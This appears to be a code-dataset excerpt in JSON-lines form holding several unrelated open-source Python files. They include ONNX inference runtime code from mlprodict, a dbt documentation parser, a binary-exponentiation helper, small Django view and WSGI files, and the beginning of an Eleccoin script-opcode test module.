fLOG(\"+kr{}'{}': {} (dtype={} min={} max={}{})\".format(\n \"=\" if len(values[k].shape) == 0 or min(\n values[k].shape) > 0 else \"*\",\n name, values[k].shape, values[k].dtype,\n mini, maxi,\n ' sparse' if isinstance(values[k], coo_matrix) else ''))\n if verbose >= 3:\n dispsimple(values[k])\n else:\n fLOG(\"+kr='{}': {}\".format(\n name, type(values[k])))\n if verbose >= 3: # pragma: no cover\n dispsimple(values[k])\n if added == 0:\n fLOG(\"? no new result\") # pragma: no cover\n\n if intermediate:\n values = [(v, k, values[v]) for k, v in self._global_index.items()]\n values.sort()\n values = OrderedDict((k, v) for _, k, v in values)\n return (values, mtime) if node_time else values\n\n try:\n res = {k: values[self._global_index[k]] for k in self.outputs_}\n except KeyError as e: # pragma: no cover\n raise RuntimeError(\"Unable to find one output [{}]\\n in [{}]\"\n \".\".format(\", \".join(sorted(self.outputs_)),\n \", \".join(sorted(values)))) from e\n return (res, mtime) if node_time else res\n\n def build_intermediate(self, outputs=None, verbose=0, overwrite_types=None,\n fLOG=None):\n \"\"\"\n Builds every possible :epkg:`ONNX` file\n which computes one specific intermediate output\n from the inputs.\n\n :param outputs: subsets of outputs to get,\n None to get all outputs,\n :param overwrite_types: shape inference does not work all the time,\n this allows to force types when building intermediate\n results, see @see fn select_model_inputs_outputs\n :param verbose: displays intermediate information\n :param fLOG: logging function\n :return: :epkg:`*py:collections:OrderedDict`\n\n .. versionchanged: 0.6\n \"\"\"\n if verbose > 0:\n fLOG('[build_intermediate] BEGIN.')\n if outputs is not None:\n if isinstance(outputs, str):\n outputs = [outputs]\n if not isinstance(outputs, set):\n outputs = set(outputs)\n ord = OrderedDict()\n for output in enumerate_model_node_outputs(self.obj, order=True):\n if outputs is not None and output not in outputs:\n continue\n subonx = select_model_inputs_outputs(\n self.obj, outputs=output, infer_shapes=True,\n overwrite=overwrite_types)\n subonx = onnx_remove_node_unused(subonx)\n if verbose > 0:\n fLOG( # pragma: no cover\n '[build_intermediate] + {}'.format(output))\n ord[output] = OnnxInference(subonx, runtime=self.runtime,\n skip_run=self.skip_run,\n runtime_options=self.runtime_options,\n inplace=self.inplace,\n input_inplace=self.input_inplace)\n if verbose > 0:\n fLOG( # pragma: no cover\n '[build_intermediate] END.')\n return ord\n\n def _run_whole_runtime(self, inputs, clean_right_away=False,\n intermediate=False, verbose=0, node_time=False,\n overwrite_types=None, yield_ops=None, fLOG=None):\n # node_time is unused\n if clean_right_away:\n raise RuntimeError( # pragma: no cover\n \"clean_right_away=true does not work with this runtime.\")\n if intermediate:\n if hasattr(self, \"intermediate_onnx_inference_\"):\n inter_run = self.intermediate_onnx_inference_ # pylint: disable=E0203\n else:\n if verbose > 0:\n fLOG( # pragma: no cover\n \"-- OnnxInference: build intermediate\")\n inter_run = self.build_intermediate(\n verbose=verbose, fLOG=fLOG, overwrite_types=overwrite_types)\n self.intermediate_onnx_inference_ = inter_run\n graph = self.to_sequence()\n self.inits_ = graph['inits']\n\n if verbose >= 1:\n fLOG( # pragma: no cover\n \"-- OnnxInference: run {} nodes\".format(\n len(self.intermediate_onnx_inference_)))\n values = OrderedDict(inputs)\n for k, v in self.inits_.items():\n values[k] = v['value']\n if verbose >= 2: # pragma: no cover\n for k in sorted(values):\n fLOG(\"-k='{}' shape={} dtype={}\".format(\n k, values[k].shape, values[k].dtype))\n for node, oinf in self.intermediate_onnx_inference_.items():\n if verbose >= 4: # pragma: no cover\n fLOG('[intermediate] %r' % node)\n if verbose >= 5: # pragma: no cover\n fLOG(oinf.obj)\n if yield_ops is not None and node.onnx_node.op_type == 'YieldOp':\n out = node.onnx_node.output[0]\n if out in yield_ops:\n values[out] = yield_ops[out]\n continue\n raise RuntimeError( # pragma: no cover\n \"YieldOp output %r could not be found in \"\n \"yield_ops: %r (node=%r).\" % (\n out, list(sorted(yield_ops)), node.onnx_node))\n output = oinf.run(inputs)[node]\n values[node] = output\n if verbose >= 1:\n if verbose >= 4: # pragma: no cover\n for k, v in inputs.items():\n if isinstance(output, numpy.ndarray):\n fLOG(\"-i='{}': {} (dtype={}) {}\".format(\n k, v.shape, v.dtype, v.ravel().tolist()))\n else:\n fLOG(\"-i='{}': {} (dtype={}) - ?\".format(\n k, v.shape, v.dtype))\n if isinstance(output, numpy.ndarray):\n fLOG(\"+k='{}': {} (dtype={})\".format(\n node, output.shape, output.dtype))\n if verbose >= 2: # pragma: no cover\n fLOG(output)\n else:\n fLOG(\"+k='{}': {}\".format( # pragma: no cover\n node, type(output)))\n if verbose >= 2: # pragma: no cover\n fLOG(output)\n return values\n\n if verbose != 0:\n warnings.warn(\n \"verbose option not implemented if runtime is 'onnxruntime1'\")\n res = self._whole.run(inputs)\n return {k: v for k, v in zip(self.outputs_, res)}\n\n def __getitem__(self, item):\n \"\"\"\n Returns the ONNX verions of a node.\n \"\"\"\n if isinstance(item, tuple):\n node_name, att_name = item\n else:\n node_name = item\n att_name = None\n\n node_ = None\n for node in self.obj.graph.node:\n if node.name == node_name:\n node_ = node\n break\n\n if node_ is None:\n raise IndexError( # pragma: no cover\n \"Unable to get node name '{}'.\\n{}\".format(\n node_name, \"\\n\".join(node.name for node in self.obj.graph.node)))\n\n if att_name is None:\n return node_\n\n for att in node_.attribute:\n if att.name == att_name:\n return att\n\n raise IndexError( # pragma: no cover\n \"Unable to find attribute '{}' from node \"\n \"'{}'.\".format(att_name, node_name))\n\n def switch_initializers_dtype(self, model=None,\n dtype_in=numpy.float32,\n dtype_out=numpy.float64):\n \"\"\"\n Switches all initializers to ``numpy.float64``. If *model*\n is None, a simple cast is done. Otherwise, the function assumes\n the model is a :epkg:`scikit-learn` pipeline.\n This only works if the runtime is ``'python'``.\n\n @param model :epkg:`scikit-learn` model or None\n @param dtype_in previous type\n @param dtype_out next type\n @return done operations\n \"\"\"\n from ..onnx_tools.optim.sklearn_helper import enumerate_fitted_arrays, pairwise_array_distances\n\n if self.runtime != 'python': # pragma: no cover\n raise RuntimeError(\"Initializers can be casted only if the \"\n \"runtime is 'python' not '{}'.\".format(self.runtime))\n\n if hasattr(self, '_values_init'):\n del self._values_init\n\n # first pass: simple cast\n done = []\n initializer = self.inits_\n for k, v in initializer.items():\n if isinstance(v['value'], numpy.ndarray):\n if v['value'].dtype == dtype_in:\n v['value'] = v['value'].astype(dtype_out)\n done.append((\"pass1\", \"+\", \"init\", k, v['value']))\n else:\n done.append((\"pass1\", \"-\", \"init\", k,\n v['value'])) # pragma: no cover\n for k, v in self.graph_['nodes'].items():\n res = v.switch_initializers_dtype(dtype_in=dtype_in,\n dtype_out=dtype_out)\n for r in res:\n done.append((\"pass1\", \"node\", k) + r)\n for k, v in self.graph_['intermediate'].items():\n if v is None:\n continue\n res = v.switch_initializers_dtype(dtype_in=dtype_in,\n dtype_out=dtype_out)\n for r in res:\n done.append((\"pass1\", \"sub\", k) + r)\n\n if model is not None:\n # Second pass, we compare all arrays from the model\n # to the arrays in the converted models.\n def dist(a):\n cast = a.astype(dtype_in).astype(dtype_out)\n d = pairwise_array_distances([cast], [a])[0, 0]\n return d\n\n done_ = [(c, c[-1]) for c in done]\n moda_ = [(a, a[-2][-1]) for a in enumerate_fitted_arrays(model)\n if dist(a[-2][-1]) > 0]\n aconv = [_[-1] for _ in done_]\n amoda = [_[-1] for _ in moda_]\n distances = pairwise_array_distances(aconv, amoda)\n\n for i in range(distances.shape[0]):\n j = numpy.argmin(distances[i])\n d = distances[i, j]\n if d < 0.1:\n numpy.copyto(aconv[i], amoda[j])\n done.append((\"pass2\", d) + done_[i][0])\n\n return done\n\n def _set_shape_inference_runtime(self):\n \"\"\"\n Set shapes based on shape inference\n relying on the runtime.\n The values are stored in every node.\n \"\"\"\n if not hasattr(self, 'sequence_') or not hasattr(self, 'inputs_'):\n raise RuntimeError( # pragma: no cover\n \"This method only works if the runtime is 'python' not \"\n \"'{}'.\".format(self.runtime))\n values = OrderedDict()\n for k, v in self.inputs_.items():\n # The function assumes the first dimension is unknown\n # and is the batch size.\n try:\n values[k] = ShapeObject(v, use_n1=True, name=k)\n except TypeError as e: # pragma: no cover\n raise TypeError(\n \"Unable to guess shape for %r (shape=%r).\" % (k, v)) from e\n\n impossible = False\n for k, v in self.statics_.items():\n # static inputs should be known.\n if k not in values:\n try:\n values[k] = ShapeObject(v)\n except TypeError:\n # default value is wrong\n impossible = True\n values[k] = None\n\n for k, v in self.inits_.items():\n values[k] = ShapeObject(v['value'], name=k)\n last = None\n for i, node in enumerate(self.sequence_):\n try:\n s = node._set_shape_inference_runtime(values)\n last = s\n except (IndexError, TypeError, KeyError,\n AttributeError) as e: # pragma: no cover\n rows = []\n if last is not None:\n for k, v in last.items():\n rows.append(\"{}: {}\".format(k, v))\n for k in range(i + 1):\n rows.append(\"{} --> {}\".format(k, self.sequence_[k]))\n if not impossible:\n raise RuntimeError(\"Unable to infer shape of node {}\\n{}\".format(\n i, '\\n'.join(rows))) from e\n return values\n\n def infer_shapes(self):\n \"\"\"\n Computes expected shapes.\n\n :return: dictionary of shapes\n \"\"\"\n return self._set_shape_inference_runtime()\n\n def _set_type_inference_runtime(self):\n \"\"\"\n Set types based on type inference\n relying on the runtime.\n The values are stored in every node.\n \"\"\"\n if not hasattr(self, 'sequence_') or not hasattr(self, 'inputs_'):\n raise RuntimeError( # pragma: no cover\n \"This method only works if the runtime is 'python' not \"\n \"'{}'.\".format(self.runtime))\n values = OrderedDict()\n for k, v in self.statics_.items():\n values[k] = None\n for k, v in self.inputs_.items():\n # The function assumes the first dimension is unknown\n # and is the batch size.\n if isinstance(v['type']['elem'], dict):\n # sequence\n values[k] = SequenceType()\n else:\n values[k] = guess_numpy_type_from_string(v['type']['elem'])\n for k, v in self.inits_.items():\n values[k] = v['value'].dtype\n last = None\n for i, node in enumerate(self.sequence_):\n try:\n s = node._set_type_inference_runtime(values)\n last = s\n except IndexError as e: # pragma: no cover\n rows = []\n if last is not None:\n for k, v in last.items():\n rows.append(\"{}: {}\".format(k, v))\n for k in range(i + 1):\n rows.append(\"{} --> {}\".format(k, self.sequence_[k]))\n raise RuntimeError(\"Unable to infer type of node {}\\n{}\".format(\n i, '\\n'.join(rows))) from e\n return values\n\n def infer_types(self):\n \"\"\"\n Computes expected shapes.\n\n :return: dictionary of types\n \"\"\"\n return self._set_type_inference_runtime()\n\n def _set_size_inference_runtime(self, inputs, context=None):\n \"\"\"\n Set sizes allocated during inference\n relying on the runtime.\n The values are stored in every node.\n \"\"\"\n if not hasattr(self, 'sequence_') or not hasattr(self, 'inputs_'):\n raise RuntimeError( # pragma: no cover\n \"This method only works if the runtime is 'python' not \"\n \"'{}'.\".format(self.runtime))\n values = OrderedDict()\n for k, v in self.statics_.items():\n if context is None:\n raise RuntimeError( # pragma: no cover\n \"static variable but context is None.\")\n values[k] = context[k]\n for k, v in self.inits_.items():\n values[k] = v['value']\n for k, v in self.inputs_.items():\n if k in inputs:\n values[k] = inputs[k]\n\n last = None\n for i, node in enumerate(self.sequence_):\n try:\n s = node._set_size_inference_runtime(values)\n last = s\n except IndexError as e: # pragma: no cover\n rows = []\n if last is not None:\n for k, v in last.items():\n rows.append(\"{}: {}\".format(k, v))\n for k in range(i + 1):\n rows.append(\"{} --> {}\".format(k, self.sequence_[k]))\n raise RuntimeError(\"Unable to infer size of node {}\\n{}\".format(\n i, '\\n'.join(rows))) from e\n return values\n\n def infer_sizes(self, inputs, context=None):\n \"\"\"\n Computes expected sizes.\n\n :param inputs: inputs as a dictionary\n :return: dictionary of dictionary of sizes\n \"\"\"\n res = self._set_size_inference_runtime(inputs, context=context)\n return {k: v for k, v in res.items() if k.startswith('#')}\n\n def _guess_inplace(self, input_inplace=False):\n \"\"\"\n Looks into every node of the graph to see\n if there is a way to do the computation\n inplace. By default (*input_inplace=False*),\n the function assumes inputs cannot be modified\n so the first node cannot do inplace computation.\n This function only works with the python runtime.\n\n @param input_inplace the computation is allowed\n to overwrite the input\n\n This function checks that one node is used only\n once and then can be modified by the next node.\n Nodes `A`, `C` can be overwritten by the computation.\n Node `B` cannot as it is used by two nodes.\n\n .. blockdiag::\n\n diagram {\n A -> B -> C -> E;\n B -> D;\n }\n\n It does not handle specific case such node `B` being\n overwritten by node `C` but without changing its shape\n and node `D` only needs the shape of `B`. Then `B` could\n be overwritten as well.\n \"\"\"\n forbid = {}\n values = OrderedDict()\n for k in self.statics_:\n values[k] = dict(inplace=False, to=[], fr=[])\n for k in self.inputs_:\n values[k] = dict(inplace=input_inplace, to=[], fr=[])\n for k in self.inits_:\n values[k] = dict(inplace=False, to=[], fr=[])\n for node in self.sequence_:\n for n in node.inputs:\n values[n]['to'].append(node)\n for n in node.outputs:\n if node.op_type == 'Constant':\n # We cannot modify constant.\n forbid[n] = node\n if n not in values:\n values[n] = dict(inplace=None, to=[], fr=[])\n values[n]['fr'].append(node)\n\n # checks the number of outputs\n outputs = set(self.output_names)\n modif = 1\n while modif > 0:\n modif = 0\n for n, v in values.items():\n if v['inplace'] is not None:\n continue\n if n in forbid:\n continue\n if len(v['to']) == 1:\n v['inplace'] = True\n modif += 1\n\n # convey the information to every node\n inplaces = {}\n for n, v in values.items():\n if v['inplace']:\n inplaces[n] = v\n for node in v['to']:\n if n in outputs:\n continue\n node.enable_inplace_compute(n)\n\n return inplaces\n\n def _build_compile_run(self, debug=False):\n \"\"\"\n Rewrite the run function in python,\n compiles it, and adds it as a method.\n\n @param debug insert debugging code\n @return method name, callable object\n\n .. exref::\n :title: Run a model with runtime 'python_compiled'\n\n The following code trains a model and compute\n the predictions with runtime ``'python_compiled'``.\n It converts the onnx graph into a python function\n which calls every operator. Its code is printed\n below.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n import numpy\n from sklearn.datasets import load_iris\n from sklearn.model_selection import train_test_split\n from sklearn.ensemble import AdaBoostClassifier\n from sklearn.tree import DecisionTreeClassifier\n from skl2onnx import to_onnx\n from mlprodict.onnxrt import OnnxInference\n\n iris = load_iris()\n X, y = iris.data, iris.target\n X_train, X_test, y_train, __ = train_test_split(X, y, random_state=11)\n y_train = y_train.astype(numpy.float32)\n clr = AdaBoostClassifier(\n base_estimator=DecisionTreeClassifier(max_depth=3),\n n_estimators=3)\n clr.fit(X_train, y_train)\n\n model_def = to_onnx(clr, X_train.astype(numpy.float32),\n target_opset=12)\n\n oinf2 = OnnxInference(model_def, runtime='python_compiled')\n print(oinf2.run({'X': X_test[:5]}))\n\n # prints out the python function equivalent\n # to the onnx graph\n print(oinf2)\n \"\"\"\n def clean_name(name):\n return name.replace(\":\", \"_\").replace('.', '_').replace('/', '_')\n\n # inits\n inputs = self.input_names\n code = ['def compiled_run(dict_inputs, yield_ops=None):']\n code.append(\" if yield_ops is not None:\")\n code.append(\n \" raise NotImplementedError('yields_ops should be None.')\")\n if debug:\n code.append(\" printed = {}\")\n\n context = {}\n\n # static variables\n for k in sorted(self.statics_):\n code.append(\" # static: {0}\".format(k))\n code.append(\" {0} = dict_inputs['{1}']\".format(\n clean_name(k), k))\n if debug:\n code.append(\n \" debug_print('i.{0}', {1}, printed)\".format(\n clean_name(k), k))\n\n # initializers\n for k, v in sorted(self.inits_.items()):\n if k.startswith(\"_OPT_\"):\n raise RuntimeError( # pragma: no cover\n \"The runtime cannot handle any constant name \"\n \"starting with '_OPT_': '{}'.\".format(k))\n if k in inputs:\n context[\"_OPT_\" + clean_name(k)] = v['value']\n code.append(\" # init: _OPT_{0} ({1})\".format(\n clean_name(k), k))\n if debug:\n code.append(\n \" debug_print('c.[_OPT_{0}]', _OPT_{1}, printed)\".format(\n clean_name(k), k))\n else:\n context[clean_name(k)] = v['value']\n code.append(\" # init: {0} ({1})\".format(\n clean_name(k), k))\n if debug:\n code.append(\n \" debug_print('c.[{0}]', {1}, printed)\".format(\n clean_name(k), k))\n\n # method signature\n code.append(\" # inputs\")\n for inp in inputs:\n if '_OPT_' + inp in context:\n # optional inputs\n code.append(\n \" {0} = dict_inputs.get('{1}', _OPT_{0})\".format(\n clean_name(inp), inp))\n else:\n code.append(\" {0} = dict_inputs['{1}']\".format(\n clean_name(inp), inp))\n if debug:\n code.append(\n \" debug_print('i.{0}', {1}, printed)\".format(\n clean_name(inp), inp))\n\n # code\n for i, node in enumerate(self.sequence_):\n name = \"n{}_{}\".format(i, node.ops_.__class__.__name__.lower())\n context[name] = node.ops_._run\n if (node.ops_.__class__.__name__ == 'Loop' and\n node.ops_.need_context()):\n # Adding context.\n ctx = \"{%s}\" % \", \".join(\n \"'%s': %s\" % (n, n) for n in node.ops_.additional_inputs)\n code.append(' ({1}, ) = {2}({0}, context={3})'.format(\n ', '.join(map(clean_name, node.inputs)),\n ', '.join(map(clean_name, node.outputs)),\n name, ctx))\n else:\n code.append(' ({1}, ) = {2}({0})'.format(\n ', '.join(map(clean_name, node.inputs)),\n ', '.join(map(clean_name, node.outputs)),\n name))\n if debug:\n code.append(\" print('''# {}''')\".format(code[-1][4:]))\n for o in node.outputs:\n code.append(\n \" debug_print('o.{0}', {1}, printed)\".format(\n clean_name(o), o))\n\n # return\n code.append(' return {')\n for out in self.output_names:\n code.append(\" '{1}': {0},\".format(\n clean_name(out), out))\n code.append(' }')\n final_code = '\\n'.join(code)\n\n # compile the outcome\n context['self'] = self\n try:\n obj = compile(final_code, \"<string>\", 'exec')\n except SyntaxError as e: # pragma: no cover\n raise SyntaxError(\n \"Unable to compile\\n#####\\n{}\".format(final_code)) from e\n fcts_obj = [_ for _ in obj.co_consts\n if _ is not None and not isinstance(_, (bool, str, int))]\n fct = make_callable(\n \"compiled_run\", fcts_obj[0], final_code, context, debug)\n\n # end\n return \"compiled_run\", fct, final_code\n\n def reduce_size(self, pickable=False):\n \"\"\"\n Reduces the memory footprint as much as possible.\n\n @param pickable keeps a pickle object?\n \"\"\"\n import gc\n del self.graph_\n if not pickable:\n del self.obj\n if self.runtime in ('python_compiled', 'python_compiled_debug'):\n del self.sequence_\n gc.collect()\n\n def get_profiling(self, as_df=False):\n \"\"\"\n Returns the profiling after a couple of execution.\n\n :param as_df: return the results as a dataframe (True)\n :return: dataframe or list of dictionaries\n\n .. versionadded:: 0.6\n \"\"\"\n if (self.runtime_options is None or\n not self.runtime_options.get('enable_profiling', False)):\n raise RuntimeError(\n \"Profiling is available if options 'enable_profiling' \"\n \"is set to true in 'runtime_options' but is %r.\" % self.runtime_options)\n prof = None\n if hasattr(self, '_whole'):\n prof = self._whole.get_profiling()\n if prof is None:\n raise NotImplementedError( # pragma: no cover\n \"profiling is only implemented for runtime 'onnxruntime1'.\")\n if as_df:\n import pandas\n return pandas.DataFrame(prof)\n return prof\n\n def get_execution_order(self):\n \"\"\"\n This function returns a dictionary `{(kind, name): (order, op)}`,\n *name* can be a node name or a result name. In that case,\n it gets the execution order than the node which created it.\n The function returns None if the order is not available\n (the selected runtime does not return it). *kind* is either\n `'node'` or `'node'`. If two nodes have the same name,\n returned order is the last one. Initializers gets an execution\n order equal to -1, inputs to 0, all others results are >= 1.\n\n .. versionadded:: 0.7\n \"\"\"\n if not hasattr(self, \"sequence_\"):\n return None\n\n res = {}\n for k, v in self.inits_.items():\n res['res', k] = (-1, v)\n for name, shape in self.input_names_shapes:\n res['res', name] = (0, shape)\n\n for i, node in enumerate(self.sequence_):\n key = ('node', node.onnx_node.name)\n res[key] = (i + 1, node)\n for out in node.onnx_node.output:\n key = ('res', out)\n if key in res:\n raise RuntimeError( # pragma: no cover\n \"Output %r of node name %r already registered.\"\n \"\" % (out, node.onnx_node.name))\n res[key] = (i + 1, None)\n\n return res\n"} {"ext": "py", "sha": "1a30fb40600d4666bd50a5b75878d708873ffa34", "content": "from typing import Iterable\n\nimport re\n\nfrom dbt.clients.jinja import get_rendered\nfrom dbt.contracts.graph.parsed import ParsedDocumentation\nfrom dbt.node_types import NodeType\nfrom dbt.parser.base import Parser\nfrom dbt.parser.search import (\n BlockContents, FileBlock, BlockSearcher\n)\n\n\nSHOULD_PARSE_RE = re.compile(r'{[{%]')\n\n\nclass DocumentationParser(Parser[ParsedDocumentation]):\n @property\n def resource_type(self) -> NodeType:\n return NodeType.Documentation\n\n @classmethod\n def get_compiled_path(cls, block: FileBlock):\n return block.path.relative_path\n\n def generate_unique_id(self, resource_name: str) -> str:\n # because docs are in their own graph namespace, node type doesn't\n # need to be part of the unique ID.\n return '{}.{}'.format(self.project.project_name, resource_name)\n\n def parse_block(\n self, block: BlockContents\n ) -> Iterable[ParsedDocumentation]:\n unique_id = self.generate_unique_id(block.name)\n contents = get_rendered(block.contents, {}).strip()\n\n doc = ParsedDocumentation(\n root_path=self.project.project_root,\n path=block.file.path.relative_path,\n original_file_path=block.path.original_file_path,\n package_name=self.project.project_name,\n unique_id=unique_id,\n name=block.name,\n block_contents=contents,\n )\n return [doc]\n\n def parse_file(self, file_block: FileBlock):\n searcher: Iterable[BlockContents] = BlockSearcher(\n source=[file_block],\n allowed_blocks={'docs'},\n source_tag_factory=BlockContents,\n )\n for block in searcher:\n for parsed in self.parse_block(block):\n self.manifest.add_doc(file_block.file, parsed)\n"} {"ext": "py", "sha": "1a30fb8fd266cca93f016ed29de1fa7e5726d0c1", "content": "\"\"\"\n* Binary Exponentiation for Powers\n* This is a method to find a^b in a time complexity of O(log b)\n* This is one of the most commonly used methods of finding powers.\n* Also useful in cases where solution to (a^b)%c is required,\n* where a,b,c can be numbers over the computers calculation limits.\n* Done using iteration, can also be done using recursion\n\n* @author chinmoy159\n* @version 1.0 dated 10/08/2017\n\"\"\"\n\n\ndef b_expo(a, b):\n res = 1\n while b > 0:\n if b&1:\n res *= a\n\n a *= a\n b >>= 1\n\n return res\n\n\ndef b_expo_mod(a, b, c):\n res = 1\n while b > 0:\n if b&1:\n res = ((res%c) * (a%c)) % c\n\n a *= a\n b >>= 1\n\n return res\n\n\"\"\"\n* Wondering how this method works !\n* It's pretty simple.\n* Let's say you need to calculate a ^ b\n* RULE 1 : a ^ b = (a*a) ^ (b/2) ---- example : 4 ^ 4 = (4*4) ^ (4/2) = 16 ^ 2\n* RULE 2 : IF b is ODD, then ---- a ^ b = a * (a ^ (b - 1)) :: where (b - 1) is even.\n* Once b is even, repeat the process to get a ^ b\n* Repeat the process till b = 1 OR b = 0, because a^1 = a AND a^0 = 1\n*\n* As far as the modulo is concerned,\n* the fact : (a*b) % c = ((a%c) * (b%c)) % c\n* Now apply RULE 1 OR 2 whichever is required.\n\"\"\"\n"} {"ext": "py", "sha": "1a30fde460e2706385b779e11d788fa9d0704901", "content": "from django.views.generic import TemplateView\n\n\nclass FrontEndView(TemplateView):\n template_name = 'home.html'\n"} {"ext": "py", "sha": "1a30fe1917e267e3092bbbdc0f86dec8f73778cb", "content": "\"\"\"\nWSGI config for testappauto614_dev_23545 project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/\n\"\"\"\n\nimport os\n\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'testappauto614_dev_23545.settings')\n\napplication = get_wsgi_application()\n"} {"ext": "py", "sha": "1a30ff06ccd24823958ce627b5d8cdaae7ac1a7b", "content": "#!/usr/bin/env python3\n# Copyright (c) 2020-2021 The Eleccoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Functionality to build scripts, as well as signature hash functions.\n\nThis file is modified from python-eleccoinlib.\n\"\"\"\n\nfrom collections import namedtuple\nimport hashlib\nimport struct\nimport unittest\nfrom typing import List, Dict\n\nfrom .key import TaggedHash, tweak_add_pubkey\n\nfrom .messages import (\n CTransaction,\n CTxOut,\n hash256,\n ser_string,\n ser_uint256,\n sha256,\n uint256_from_str,\n)\n\nMAX_SCRIPT_ELEMENT_SIZE = 520\nLOCKTIME_THRESHOLD = 500000000\nANNEX_TAG = 0x50\n\nOPCODE_NAMES = {} # type: Dict[CScriptOp, str]\n\nLEAF_VERSION_TAPSCRIPT = 0xc0\n\ndef hash160(s):\n return hashlib.new('ripemd160', sha256(s)).digest()\n\ndef bn2vch(v):\n \"\"\"Convert number to eleccoin-specific little endian format.\"\"\"\n # We need v.bit_length() bits, plus a sign bit for every nonzero number.\n n_bits = v.bit_length() + (v != 0)\n # The number of bytes for that is:\n n_bytes = (n_bits + 7) // 8\n # Convert number to absolute value + sign in top bit.\n encoded_v = 0 if v == 0 else abs(v) | ((v < 0) << (n_bytes * 8 - 1))\n # Serialize to bytes\n return encoded_v.to_bytes(n_bytes, 'little')\n\n_opcode_instances = [] # type: List[CScriptOp]\nclass CScriptOp(int):\n \"\"\"A single script opcode\"\"\"\n __slots__ = ()\n\n @staticmethod\n def encode_op_pushdata(d):\n \"\"\"Encode a PUSHDATA op, returning bytes\"\"\"\n if len(d) < 0x4c:\n return b'' + bytes([len(d)]) + d # OP_PUSHDATA\n elif len(d) <= 0xff:\n return b'\\x4c' + bytes([len(d)]) + d # OP_PUSHDATA1\n elif len(d) <= 0xffff:\n return b'\\x4d' + struct.pack(b'<H', len(d)) + d # OP_PUSHDATA2\n elif len(d) <= 0xffffffff:\n return b'\\x4e' + struct.pack(b'<I', len(d)) + d # OP_PUSHDATA4\n else:\n raise ValueError(\"Data too long to encode in a PUSHDATA op\")\n\n @staticmethod\n def encode_op_n(n):\n \"\"\"Encode a small integer op, returning an opcode\"\"\"\n if not (0 <= n <= 16):\n raise ValueError('Integer must be in range 0 <= n <= 16, got %d' % n)\n\n if n == 0:\n return OP_0\n else:\n return CScriptOp(OP_1 + n - 1)\n\n def decode_op_n(self):\n \"\"\"Decode a small integer opcode, returning an integer\"\"\"\n if self == OP_0:\n return 0\n\n if not (self == OP_0 or OP_1 <= self <= OP_16):\n raise ValueError('op %r is not an OP_N' % self)\n\n return int(self - OP_1 + 1)\n\n def is_small_int(self):\n \"\"\"Return true if the op pushes a small integer to the stack\"\"\"\n if 0x51 <= self <= 0x60 or self == 0:\n return True\n else:\n return False\n\n def __str__(self):\n return repr(self)\n\n def __repr__(self):\n if self in OPCODE_NAMES:\n return OPCODE_NAMES[self]\n else:\n return 'CScriptOp(0x%x)' % self\n\n def __new__(cls, n):\n try:\n return _opcode_instances[n]\n except IndexError:\n assert len(_opcode_instances) == n\n _opcode_instances.append(super().__new__(cls, n))\n return _opcode_instances[n]\n\n# Populate opcode instance table\nfor n in range(0xff + 1):\n CScriptOp(n)\n\n\n# push value\nOP_0 = CScriptOp(0x00)\nOP_FALSE = OP_0\nOP_PUSHDATA1 = CScriptOp(0x4c)\nOP_PUSHDATA2 = CScriptOp(0x4d)\nOP_PUSHDATA4 = CScriptOp(0x4e)\nOP_1NEGATE = CScriptOp(0x4f)\nOP_RESERVED = CScriptOp(0x50)\nOP_1 = CScriptOp(0x51)\nOP_TRUE = OP_1\nOP_2 = CScriptOp(0x52)\nOP_3 = CScriptOp(0x53)\nOP_4 = CScriptOp(0x54)\nOP_5 = CScriptOp(0x55)\nOP_6 = CScriptOp(0x56)\nOP_7 = CScriptOp(0x57)\nOP_8 = CScriptOp(0x58)\nOP_9 = CScriptOp(0x59)\nOP_10 = CScriptOp(0x5a)\nOP_11 = CScriptOp(0x5b)\nOP_12 = CScriptOp(0x5c)\nOP_13 = CScriptOp(0x5d)\nOP_14 = CScriptOp(0x5e)\nOP_15 = CScriptOp(0x5f)\nOP_16 = CScriptOp(0x60)\n\n# control\nOP_NOP = CScriptOp(0x61)\nOP_VER = CScriptOp(0x62)\nOP_IF = CScriptOp(0x63)\nOP_NOTIF = CScriptOp(0x64)\nOP_VERIF = CScriptOp(0x65)\nOP_VERNOTIF = CScriptOp(0x66)\nOP_ELSE = CScriptOp(0x67)\nOP_ENDIF = CScriptOp(0x68)\nOP_VERIFY = CScriptOp(0x69)\nOP_RETURN = CScriptOp(0x6a)\n\n# stack ops\nOP_TOALTSTACK = CScriptOp(0x6b)\nOP_FROMALTSTACK = CScriptOp(0x6c)\nOP_2DROP = CScriptOp(0x6d)\nOP_2DUP = CScriptOp(0x6e)\nOP_3DUP = CScriptOp(0x6f)\nOP_2OVER = CScriptOp(0x70)\nOP_2ROT = CScriptOp(0x71)\nOP_2SWAP = CScriptOp(0x72)\nOP_IFDUP = CScriptOp(0x73)\nOP_DEPTH = CScriptOp(0x74)\nOP_DROP = CScriptOp(0x75)\nOP_DUP = CScriptOp(0x76)\nOP_NIP = CScriptOp(0x77)\nOP_OVER = CScriptOp(0x78)\nOP_PICK = CScriptOp(0x79)\nOP_ROLL = CScriptOp(0x7a)\nOP_ROT = CScriptOp(0x7b)\nOP_SWAP = CScriptOp(0x7c)\nOP_TUCK = CScriptOp(0x7d)\n\n# splice ops\nOP_CAT = CScriptOp(0x7e)\nOP_SUBSTR = CScriptOp(0x7f)\nOP_LEFT = CScriptOp(0x80)\nOP_RIGHT = CScriptOp(0x81)\nOP_SIZE = CScriptOp(0x82)\n\n# bit logic\nOP_INVERT = CScriptOp(0x83)\nOP_AND = CScriptOp(0x84)\nOP_OR = CScriptOp(0x85)\nOP_XOR = CScriptOp(0x86)\nOP_EQUAL = CScriptOp(0x87)\nOP_EQUALVERIFY = CScriptOp(0x88)\nOP_RESERVED1 = CScriptOp(0x89)\nOP_RESERVED2 = CScriptOp(0x8a)\n\n# numeric\nOP_1ADD = CScriptOp(0x8b)\nOP_1SUB = CScriptOp(0x8c)\nOP_2MUL = CScriptOp(0x8d)\nOP_2DIV = CScriptOp(0x8e)\nOP_NEGATE = CScriptOp(0x8f)\nOP_ABS = CScriptOp(0x90)\nOP_NOT = CScriptOp(0x91)\nOP_0NOTEQUAL = CScriptOp(0x92)\n\nOP_ADD = CScriptOp(0x93)\nOP_SUB = 